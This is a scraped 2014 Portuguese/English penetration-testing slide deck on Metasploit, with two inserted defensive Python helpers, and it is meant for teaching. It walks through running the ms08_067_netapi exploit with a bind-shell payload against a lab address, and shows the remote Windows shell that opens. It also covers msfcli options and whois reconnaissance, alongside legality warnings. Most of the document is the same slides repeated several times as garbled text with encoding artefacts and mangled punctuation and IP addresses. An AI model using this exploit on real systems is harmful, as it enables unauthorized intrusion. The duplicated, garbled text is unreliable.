PENTEST

Cerutti – IESGF - 2014

Old-school pentester

• Things were easy because it was all new
• Departments were not prepared and...
• It happened easily

Today

Phases of a PTEST

1. Pre-engagement interactions
2. Intelligence gathering
3. Threat modeling
4. Vulnerability analysis
5. Exploitation
6. Post exploitation
7. Reporting

Metasploit – exploiting vulnerabilities

• Don't be malicious
• Don't be stupid
• Don't attack targets without written permission
• Consider the consequences of your actions
• If you do things illegally you can be caught and put in jail

Metasploit

Starting MSFconsole

To launch msfconsole, enter msfconsole at the command line:

    root@bt:/# cd /opt/framework3/msf3
    root@bt:/opt/framework3/msf3# msfconsole

                    < metasploit >
                     ------------
                            \   ,__,
                             \  (oo)____
                                (__)    )\
                                   ||--|| *

    msf >

To access msfconsole's help files, enter help followed by the command which you are interested in. In the next example we are looking for help for the command connect, which allows us to communicate with a host. The resulting documentation lists usage, a description of the tool, and the various option flags:

    msf > help connect

msfcli

It is a fantastic tool for unique exploitation when you know exactly which exploit and options you need. It is less forgiving than msfconsole, but it offers some basic help (including usage and a list of modes) with the command msfcli -h, as shown here:

    root@bt:/opt/framework3/msf3# msfcli -h
    Usage: /opt/framework3/msf3/msfcli <exploit_name> <option=value> [mode]
    ==============================================================================

        Mode           Description
        ----           -----------
        (H)elp         You're looking at it baby!
        (S)ummary      Show information about this module
        (O)ptions      Show available options for this module
        (A)dvanced     Show available advanced options for this module
        (I)DS Evasion  Show available ids evasion options for this module
        (P)ayloads     Show available payloads for this module
        (T)argets      Show available targets for this exploit module
        (AC)tions      Show available actions for this auxiliary module
        (C)heck        Run the check routine of the selected module
        (E)xecute      Execute the selected module

    root@bt:/opt/framework3/msf3#

Sample Usage

    root@bt:/# msfcli windows/smb/ms08_067_netapi O
    [*] Please wait while we load the module tree...

        Name     Current Setting  Required  Description
        ----     ---------------  --------  -----------
        RHOST    0.0.0.0          yes       The target address
        RPORT    445              yes       Set the SMB service port
        SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

You can see that the module requires three options: RHOST, RPORT and SMBPIPE. Now, by adding a P, we can check for available payloads:

    root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
    [*] Please wait while we load the module tree...

    Compatible payloads
    ===================

        Name                    Description
        ----                    -----------
        generic/debug_trap      Generate a debug trap in the target process
        generic/shell_bind_tcp  Listen for a connection and spawn a command shell

Having set all the required options for our exploit and selected a payload, we can run our exploit by passing the letter E at the end of the msfcli argument string, as shown here – NEXT SLIDE

REMOTE WINDOWS PROMPT

    root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
    [*] Please wait while we load the module tree...
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Sending stage (240 bytes)
    [*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>

We're successful!
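The slides stress written permission and a dedicated test environment; the msfcli option table shown above is what a pre-flight check can inspect before the E step. This added example (not Metasploit code, and not from the slides) parses a constructed copy of that table, overlays the KEY=VALUE arguments that would be given to msfcli, and reports any required option still unset or an RHOST outside the authorized scope; the scope list is an assumption.

```python
"""Pre-flight check before the E (execute) step of an msfcli run.

Added example for this page; it is not Metasploit code. It parses the
option table printed by the O mode (a constructed copy of the
windows/smb/ms08_067_netapi table shown above), overlays the KEY=VALUE
arguments that would be passed to msfcli, and refuses to proceed when a
required option is still unset or RHOST falls outside the authorized
scope. The scope list is an assumption for the demo.
"""
import ipaddress

# Constructed copy of the `msfcli windows/smb/ms08_067_netapi O` output.
OPTIONS_TABLE = """\
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    0.0.0.0          yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
"""

# Assumed scope of the written authorization: only the lab /24.
AUTHORIZED_SCOPE = ["192.168.1.0/24"]

# What the table shows for an option that was never given a value.
UNSET = {"", "0.0.0.0"}


def parse_options(table):
    """Return {name: (current_setting, required)} from the column-aligned table."""
    lines = [l for l in table.splitlines() if l.strip()]
    header = next(l for l in lines if "Current Setting" in l)
    # Column offsets come from the header, so blank settings parse correctly.
    c_cur, c_req, c_desc = (header.index(h) for h in ("Current Setting", "Required", "Description"))
    opts = {}
    for line in lines[lines.index(header) + 1:]:
        if line.strip().startswith("----"):
            continue  # separator row
        name = line[:c_cur].strip()
        current = line[c_cur:c_req].strip()
        required = line[c_req:c_desc].strip().lower() == "yes"
        opts[name] = (current, required)
    return opts


def apply_args(opts, args):
    """Overlay msfcli-style KEY=VALUE arguments on the parsed defaults."""
    merged = dict(opts)
    for arg in args:
        key, sep, value = arg.partition("=")
        if sep:
            merged[key] = (value, merged.get(key, ("", False))[1])
    return merged


def preflight(opts, args, scope):
    """Return a list of problems; an empty list means the run may proceed."""
    merged = apply_args(opts, args)
    problems = [f"required option {n} is not set"
                for n, (cur, req) in merged.items() if req and cur in UNSET]
    rhost = merged.get("RHOST", ("", False))[0]
    if rhost not in UNSET:
        try:
            addr = ipaddress.ip_address(rhost)
        except ValueError:
            problems.append(f"RHOST {rhost!r} is not an IP address")
        else:
            if not any(addr in ipaddress.ip_network(n) for n in scope):
                problems.append(f"RHOST {rhost} is outside the authorized scope")
    return problems


if __name__ == "__main__":
    opts = parse_options(OPTIONS_TABLE)
    for args in ([], ["RHOST=192.168.1.155"], ["RHOST=10.0.0.5"]):
        print(args, preflight(opts, args, AUTHORIZED_SCOPE) or "OK")
```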

Running Armitage

To launch armitage, run the command armitage. During startup, select Start MSF, which will allow armitage to connect to your Metasploit instance.

    root@bt:/opt/framework3/msf3# armitage

Gathering reconnaissance on the environment

Attention:
• If you follow the procedures shown here, you may damage your own system and the target system
• Make sure that the test environment, and only the test environment, is used
• Many of the examples are destructive and leave the target unusable
• The activities described here may be considered ILLEGAL when used ILLICITLY or with bad intentions
• Follow the rules; don't try to be smarter than the guy who will trace your steps after the event

whois Lookups

    msf > whois secmaniac.net
    [*] exec: whois secmaniac.net

    Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
    Domain Name: SECMANIAC.NET
    Created on: 03-Feb-10
    Expires on: 03-Feb-12
    Last Updated on: 03-Feb-10

    Domain servers in listed order:
    NS57.DOMAINCONTROL.COM
    NS58.DOMAINCONTROL.COM
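The fields a tester collects in this lookup (registrar, creation and expiry dates, nameservers) are the same ones a defender should monitor for their own domains. This added example, not part of the slides and not Metasploit's whois wrapper, parses a constructed copy of the GoDaddy-style record above and derives domain age, days to expiry and whether all nameservers sit with one DNS provider; the reference dates and the renewal threshold are assumptions.

```python
"""Turn the GoDaddy-style whois record above into facts worth tracking.

Added example for this page, not Metasploit's whois wrapper. The record is
a constructed copy of the output above; the reference dates are assumptions.
The same fields a tester collects about a target (registrar, age, expiry,
nameservers) are the ones a defender should monitor on their own domains:
a lapsed registration is a takeover risk, and a surprise nameserver change
is a hijack indicator.
"""
from datetime import datetime

# Constructed copy of the `whois secmaniac.net` output shown above.
WHOIS_RECORD = """\
Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: SECMANIAC.NET
Created on: 03-Feb-10
Expires on: 03-Feb-12
Last Updated on: 03-Feb-10

Domain servers in listed order:
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM
"""

RENEWAL_WARNING_DAYS = 60  # assumed threshold for the renewal warning


def parse_whois(text):
    """Return {field: value}; the nameserver block becomes a lower-cased list."""
    fields, servers = {}, []
    in_servers = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Domain servers in listed order"):
            in_servers = True  # every line after this header is a nameserver
            continue
        if in_servers:
            servers.append(line.lower())
            continue
        key, sep, value = line.partition(":")  # first colon only, so the
        if sep:                                 # URL in the registrar line survives
            fields[key.strip()] = value.strip()
    fields["nameservers"] = servers
    return fields


def parse_date(text):
    """Dates in this record use DD-Mon-YY (e.g. 03-Feb-10)."""
    return datetime.strptime(text, "%d-%b-%y").date()


def summarize(fields, today):
    """Derive the facts a monitoring job would alert on, relative to `today`."""
    created = parse_date(fields["Created on"])
    expires = parse_date(fields["Expires on"])
    ns = fields["nameservers"]
    # ns57.domaincontrol.com -> domaincontrol.com: the DNS provider behind each server
    providers = {name.split(".", 1)[1] for name in ns}
    days_left = (expires - today).days
    return {
        "domain": fields["Domain Name"].lower(),
        "registrar": fields["Registered through"],
        "age_days": (today - created).days,
        "days_to_expiry": days_left,
        "expired": days_left < 0,
        "renewal_warning": 0 <= days_left < RENEWAL_WARNING_DAYS,
        "nameservers": ns,
        "single_dns_provider": len(providers) == 1,
    }


if __name__ == "__main__":
    facts = summarize(parse_whois(WHOIS_RECORD), parse_date("01-Jun-11"))
    for key, value in facts.items():
        print(f"{key:>20}: {value}")
```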

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 2: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Pentester antigo

bull Facilidades pela novidadebull Departamentos natildeo estavam preparados ebull Acontecia facilmente

Hoje

Fases dos testes de PTEST

1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios

Metasploit ndash explorando vulnerabilidades

bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written

permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught

and put in jail

Metasploit

Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 3: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Hoje

Fases dos testes de PTEST

1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios

Metasploit ndash explorando vulnerabilidades

bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written

permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught

and put in jail

Metasploit

Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 4: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Fases dos testes de PTEST

1 Interaccedilotildees Pre-contrataccedilatildeo2 Acumulo de Inteligencia 3 Modelagem das ameaccedilas4 Anaacutelise das vulnerabilidades5 Exploitation6 Post Exploitation7 Relatoacuterios

Metasploit ndash explorando vulnerabilidades

bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written

permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught

and put in jail

Metasploit

Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 5: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Metasploit ndash explorando vulnerabilidades

bull 1048698 Donrsquot be maliciousbull 1048698 Donrsquot be stupidbull 1048698 Donrsquot attack targets without written

permissionbull 1048698 Consider the consequences of your actionsbull 1048698 If you do things illegally you can be caught

and put in jail

Metasploit

Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

msf gt whois secmaniacnet[] exec whois secmaniacnet tempo Intelligence Gathering 17Registered through GoDaddycom Inc (httpwwwgodaddycom)Domain Name SECMANIACNETCreated on 03-Feb-10Expires on 03-Feb-12Last Updated on 03-Feb-101048698Domain servers in listed orderNS57DOMAINCONTROLCOMNS58DOMAINCONTROLCOM

  • PENTEST
  • Slide 2
  • Slide 3
  • Slide 4
  • Pentester antigo
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Hoje
  • Fases dos testes de PTEST
  • Metasploit ndash explorando vulnerabilidades
  • Metasploit
  • Slide 16
  • Sample Usage
  • Slide 18
  • Slide 19
  • PROMPT WINDOWS REMOTO
  • Running Armitage
  • Slide 22
  • Acumulando o reconhecimento do ambiente
  • whois Lookups
Page 6: PENTEST Cerutti – IESGF - 2014. Pentester antigo Facilidades pela novidade Departamentos não estavam preparados e... Acontecia facilmente:

Metasploit

Starting MSFconsoleTo launch msfconsole enter msfconsole at the command linerootbt cd optframework3msf3rootbtoptframeworkmsf3 msfconsolelt metasploit gt------------ __ (oo)____ (__) ) ||--|| msf gtTo access msfconsolersquos help files enter help followed by the commandwhich you are interested in In the next example we are looking for helpfor the command connect which allows us to communicate with a host Theresulting documentation lists usage a description of the tool and the variousoption flagsmsf gt help connect

msfcli It is a fantastic tool forunique exploitation when you know exactly which exploit and options youneed It is less forgiving than msfconsole but it offers some basic help (includingusage and a list of modes) with the command msfcli -h as shown hererootbtoptframework3msf3 msfcli -hUsage optframework3msf3msfcli ltexploit_namegt ltoption=valuegt [mode]==============================================================================Mode Description---- ---------------(H)elp Youre looking at it baby(S)ummary Show information about this module(O)ptions Show available options for this module(A)dvanced Show available advanced options for this module(I)DS Evasion Show available ids evasion options for this module(P)ayloads Show available payloads for this module(T)argets Show available targets for this exploit module(AC)tions Show available actions for this auxiliary module(C)heck Run the check routine of the selected module(E)xecute Execute the selected modulerootbtoptframework3msf3

Sample Usage

rootbt msfcli windowssmbms08_067_netapi O[] Please wait while we load the module treeName Current Setting Required Description---- --------------- -------- -----------RHOST 0000 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER SRVSVC)

You can see that the module requires three options RHOST RPORT andSMPIPE Now by adding a P we can check for available payloadsrootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 P[] Please wait while we load the module tree

Compatible payloads===================Name Description---- -----------genericdebug_trap Generate a debug trap in the target processgenericshell_bind_tcp Listen for a connection and spawn a command shellHaving set all the required options for our exploit and selecting a payloadwe can run our exploit by passing the letter E to the end of the msfcliargument string as shown here ndash PROacuteXIMO SLIDE

PROMPT WINDOWS REMOTO

rootbt msfcli windowssmbms08_067_netapi RHOST=1921681155 PAYLOAD=windowsshellbind_tcp E[] Please wait while we load the module tree[] Started bind handler[] Automatically detecting the target[] Fingerprint Windows XP Service Pack 2 - langEnglish[] Selected Target Windows XP SP2 English (NX)[] Triggering the vulnerability[] Sending stage (240 bytes)[] Command shell session 1 opened (192168110146025 -gt 19216811554444)Microsoft Windows XP [Version 512600](C) Copyright 1985-2001 Microsoft CorpCWINDOWSsystem32gtWersquore successful

Running Armitage

To launch armitage run the command armitage During startup select Start MSF which will allow armitage to connect to your Metasploit instancerootbtoptframework3msf3 armitage

Acumulando o reconhecimento do ambiente

Atenccedilatildeobull Se vocecirc seguir os procedimentos aqui indicados voce pode

danificar seu sistema e o sistema alvobull Esteja certo de que o ambiente de testes e somente o

ambiente de testes seraacute usado bull Muitos exemplos satildeo destrutivos e tornam o alvo inutilizaacutevelbull As atividades descritas aqui podem ser consideradas ILEGAIS

quando usadas ILICITAMENTE ou com maacutes intenccedilotildeesbull Siga as regras natildeo tente ser mais esperto que o cara que iraacute

rastrear teus passos depois do evento

whois Lookups

